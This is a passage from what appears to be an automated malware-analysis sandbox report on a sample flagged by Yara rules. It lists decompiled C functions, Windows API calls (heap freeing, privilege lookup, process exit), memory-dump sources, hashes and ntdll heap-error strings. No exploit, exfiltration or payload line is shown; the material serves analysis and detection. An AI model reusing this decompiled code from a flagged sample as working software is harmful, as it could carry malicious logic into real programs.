				return _t10;
			}





                                                                                                                    0x004184ef
                                                                                                                    0x004184f7
                                                                                                                    0x0041850d
                                                                                                                    0x00418511

                                                                                                                    APIs
                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3298025750-0
                                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                    • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                    • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                    0x0041865a
                                                                                                                    0x00418670
                                                                                                                    0x00418674

                                                                                                                    APIs
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3899507212-0
                                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                    • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                    • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00418512, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E00418512() {
				signed char _t13;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t20;

				asm("pushad");
				_pop(_t16);
				asm("fisubr word [eax+ecx*2+0x11]");
				asm("int 0xc0");
				 *(_t18 - 0x75) =  *(_t18 - 0x75) & _t13;
				_push(_t18);
				_t19 = _t20;
				_t9 =  *((intOrPtr*)(_t19 + 8));
				E00418DD0(_t15,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 8)) + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess( *(_t19 + 0xc));
			}








                                                                                                                    0x00418512
                                                                                                                    0x00418518
                                                                                                                    0x00418519
                                                                                                                    0x0041851d
                                                                                                                    0x0041851f
                                                                                                                    0x00418520
                                                                                                                    0x00418521
                                                                                                                    0x00418523
                                                                                                                    0x0041853a
                                                                                                                    0x00418548

                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: 7c0e386aa062e71b480d8ff46bb97002ac1e566c78b8ad649ab6ba5af2f5d55f
                                                                                                                    • Instruction ID: 335d762f6bb65cfd72260c62db0d921a475f7b30953b8f3697169f18a9742925
                                                                                                                    • Opcode Fuzzy Hash: 7c0e386aa062e71b480d8ff46bb97002ac1e566c78b8ad649ab6ba5af2f5d55f
                                                                                                                    • Instruction Fuzzy Hash: 35E0DF715042006EC720DF78CC85EC73F689F14750F06819CB909AB282D970D600CA90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00418520(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                    0x00418523
                                                                                                                    0x0041853a
                                                                                                                    0x00418548

                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                    • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                    • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AD967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: c39b2336a2e4710c3ca4b9299de3defe155f02af67e87e3e63eaa70de0e24b5e
                                                                                                                    • Instruction ID: f781954be2297d9b0edce2cd1316ec69c8dfbef58d2a3cd7478726b3d5bb8dab
                                                                                                                    • Opcode Fuzzy Hash: c39b2336a2e4710c3ca4b9299de3defe155f02af67e87e3e63eaa70de0e24b5e
                                                                                                                    • Instruction Fuzzy Hash: CAB09B719014C5C5D711D7714608727790077D0741F26C062D1030655A4778C491F6B6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00B4B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • *** then kb to get the faulting stack, xrefs: 00B4B51C
                                                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B4B2DC
                                                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B4B47D
                                                                                                                    • *** enter .cxr %p for the context, xrefs: 00B4B50D
                                                                                                                    • write to, xrefs: 00B4B4A6
                                                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B4B3D6
                                                                                                                    • read from, xrefs: 00B4B4AD, 00B4B4B2
                                                                                                                    • *** enter .exr %p for the exception record, xrefs: 00B4B4F1
                                                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B4B53F
                                                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B4B484
                                                                                                                    • *** Inpage error in %ws:%s, xrefs: 00B4B418
                                                                                                                    • Go determine why that thread has not released the critical section., xrefs: 00B4B3C5
                                                                                                                    • The instruction at %p referenced memory at %p., xrefs: 00B4B432
                                                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B4B305
                                                                                                                    • This failed because of error %Ix., xrefs: 00B4B446
                                                                                                                    • The instruction at %p tried to %s , xrefs: 00B4B4B6
                                                                                                                    • <unknown>, xrefs: 00B4B27E, 00B4B2D1, 00B4B350, 00B4B399, 00B4B417, 00B4B48E
                                                                                                                    • a NULL pointer, xrefs: 00B4B4E0
                                                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B4B314
                                                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B4B38F
                                                                                                                    • The resource is owned exclusively by thread %p, xrefs: 00B4B374
                                                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B4B39B
                                                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00B4B2F3
                                                                                                                    • an invalid address, %p, xrefs: 00B4B4CF
                                                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 00B4B48F
                                                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B4B323
                                                                                                                    • The resource is owned shared by %d threads, xrefs: 00B4B37E
                                                                                                                    • The critical section is owned by thread %p., xrefs: 00B4B3B9
                                                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B4B476
                                                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 00B4B352
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                    • API String ID: 0-108210295
                                                                                                                    • Opcode ID: 19fac94b00d31550df62527cca4df5091b64f6bdbeda23c53f0a10780fc1e9d4
                                                                                                                    • Instruction ID: 1b7ba72583b4613e892393c43a27cb057c0761abd619c0923ef687f432768d7b
                                                                                                                    • Opcode Fuzzy Hash: 19fac94b00d31550df62527cca4df5091b64f6bdbeda23c53f0a10780fc1e9d4
                                                                                                                    • Instruction Fuzzy Hash: 2D81F275A40210FBCB21AA059C8AE7B3BA5EF56B51F4044C4F2086B2A7D371CE11EB72
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B51C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E00B51C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xa748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A9B150();
				} else {
					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xb8589c);
				E00A9B150("Heap error detected at %p (heap handle %p)\n",  *0xb858a0);
				_t27 =  *0xb85898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00B51E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A9B150();
				} else {
					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00A9B150("Error code: %d - %s\n",  *0xb85898);
				_t113 =  *0xb858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A9B150();
					} else {
						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A9B150("Parameter1: %p\n",  *0xb858a4);
				}
				_t115 =  *0xb858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A9B150();
					} else {
						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A9B150("Parameter2: %p\n",  *0xb858a8);
				}
				_t117 =  *0xb858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A9B150();
					} else {
						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A9B150("Parameter3: %p\n",  *0xb858ac);
				}
				_t119 =  *0xb858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A9B150();
					} else {
						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xb858b4);
					E00A9B150("Last known valid blocks: before - %p, after - %p\n",  *0xb858b0);
				} else {
					_t120 =  *0xb858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A9B150();
				} else {
					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00A9B150("Stack trace available at %p\n", 0xb858c0);
			}











                                                                                                                    0x00b51c10
                                                                                                                    0x00b51c16
                                                                                                                    0x00b51c1e
                                                                                                                    0x00b51c3d
                                                                                                                    0x00b51c3e
                                                                                                                    0x00b51c20
                                                                                                                    0x00b51c35
                                                                                                                    0x00b51c3a
                                                                                                                    0x00b51c44
                                                                                                                    0x00b51c55
                                                                                                                    0x00b51c5a
                                                                                                                    0x00b51c65
                                                                                                                    0x00b51c67
                                                                                                                    0x00000000
                                                                                                                    0x00b51c6e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b51c67
                                                                                                                    0x00b51cdc
                                                                                                                    0x00b51ce5
                                                                                                                    0x00b51d04
                                                                                                                    0x00b51d05
                                                                                                                    0x00b51ce7
                                                                                                                    0x00b51cfc
                                                                                                                    0x00b51d01
                                                                                                                    0x00b51d0b
                                                                                                                    0x00b51d17
                                                                                                                    0x00b51d1f
                                                                                                                    0x00b51d25
                                                                                                                    0x00b51d30
                                                                                                                    0x00b51d4f
                                                                                                                    0x00b51d50
                                                                                                                    0x00b51d32
                                                                                                                    0x00b51d47
                                                                                                                    0x00b51d4c
                                                                                                                    0x00b51d61
                                                                                                                    0x00b51d67
                                                                                                                    0x00b51d68
                                                                                                                    0x00b51d6e
                                                                                                                    0x00b51d79
                                                                                                                    0x00b51d98
                                                                                                                    0x00b51d99
                                                                                                                    0x00b51d7b
                                                                                                                    0x00b51d90
                                                                                                                    0x00b51d95
                                                                                                                    0x00b51daa
                                                                                                                    0x00b51db0
                                                                                                                    0x00b51db1
                                                                                                                    0x00b51db7
                                                                                                                    0x00b51dc2
                                                                                                                    0x00b51de1
                                                                                                                    0x00b51de2
                                                                                                                    0x00b51dc4
                                                                                                                    0x00b51dd9
                                                                                                                    0x00b51dde
                                                                                                                    0x00b51df3
                                                                                                                    0x00b51df9
                                                                                                                    0x00b51dfa
                                                                                                                    0x00b51e00
                                                                                                                    0x00b51e0a
                                                                                                                    0x00b51e13
                                                                                                                    0x00b51e32
                                                                                                                    0x00b51e33
                                                                                                                    0x00b51e15
                                                                                                                    0x00b51e2a
                                                                                                                    0x00b51e2f
                                                                                                                    0x00b51e39
                                                                                                                    0x00b51e4a
                                                                                                                    0x00b51e02
                                                                                                                    0x00b51e02
                                                                                                                    0x00b51e08
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b51e08
                                                                                                                    0x00b51e5b
                                                                                                                    0x00b51e7a
                                                                                                                    0x00b51e7b
                                                                                                                    0x00b51e5d
                                                                                                                    0x00b51e72
                                                                                                                    0x00b51e77
                                                                                                                    0x00b51e95

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.301900371.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                    • API String ID: 0-2897834094
                                                                                                                    • Opcode ID: 672c8b1cf75749e3f739d79e143472a7e65d11cf9311144bfaf7968589730acc
                                                                                                                    • Instruction ID: 387206be0fa3bc0a790ebff6fa0b60daf7df9d24ca095a6493c50e3303db7147
                                                                                                                    • Opcode Fuzzy Hash: 672c8b1cf75749e3f739d79e143472a7e65d11cf9311144bfaf7968589730acc
                                                                                                                    • Instruction Fuzzy Hash: 61612636661580DFD711EB48EA96F2073E4EB04B2272988FAFC0D6F261D6618C44CB1A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00AA3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00AA3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00AA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00AA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00AA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00AA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00AA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00AB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00ADF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00AE1370(_t276, 0xa74e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00ADBB40(0,  &_v68, _t170);
									if(L00AA43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00ADBB40(_t257,  &_v68, _t243);
								if(L00AA43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00AE1370(_t278, 0xa74e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00AB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00ADF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00AE1370(_v16, 0xa74e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00ADBB40(_t262,  &_v68, _t244);
								if(L00AA43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00AE1370(_t282, 0xa74e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00ADBB40(_t262,  &_v68, _t201);
							if(L00AA43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00AB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00ADF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00AE1370(_t280, 0xa74e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00ADBB40(_t267,  &_v68, _t245);
							if(L00AA43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00AE1370(_t284, 0xa74e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00ADBB40(_t267,  &_v68, _t224);
						if(L00AA43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                    0x00aa3d3c
                                                                                                                    0x00aa3d42
                                                                                                                    0x00aa3d44
                                                                                                                    0x00aa3d46
                                                                                                                    0x00aa3d49
                                                                                                                    0x00aa3d4c
                                                                                                                    0x00aa3d4f
                                                                                                                    0x00aa3d52
                                                                                                                    0x00aa3d55
                                                                                                                    0x00aa3d58
                                                                                                                    0x00aa3d5b
                                                                                                                    0x00aa3d5f
                                                                                                                    0x00aa3d61
                                                                                                                    0x00aa3d66
                                                                                                                    0x00af8213
                                                                                                                    0x00af8218
                                                                                                                    0x00aa4085
                                                                                                                    0x00aa4088
                                                                                                                    0x00aa408e
                                                                                                                    0x00aa4094
                                                                                                                    0x00aa409a
                                                                                                                    0x00aa40a0
                                                                                                                    0x00aa40a6
                                                                                                                    0x00aa40a9
                                                                                                                    0x00aa40af
                                                                                                                    0x00aa40b6
                                                                                                                    0x00aa40bd
                                                                                                                    0x00aa40bd
                                                                                                                    0x00aa3d83
                                                                                                                    0x00af821f
                                                                                                                    0x00af8229
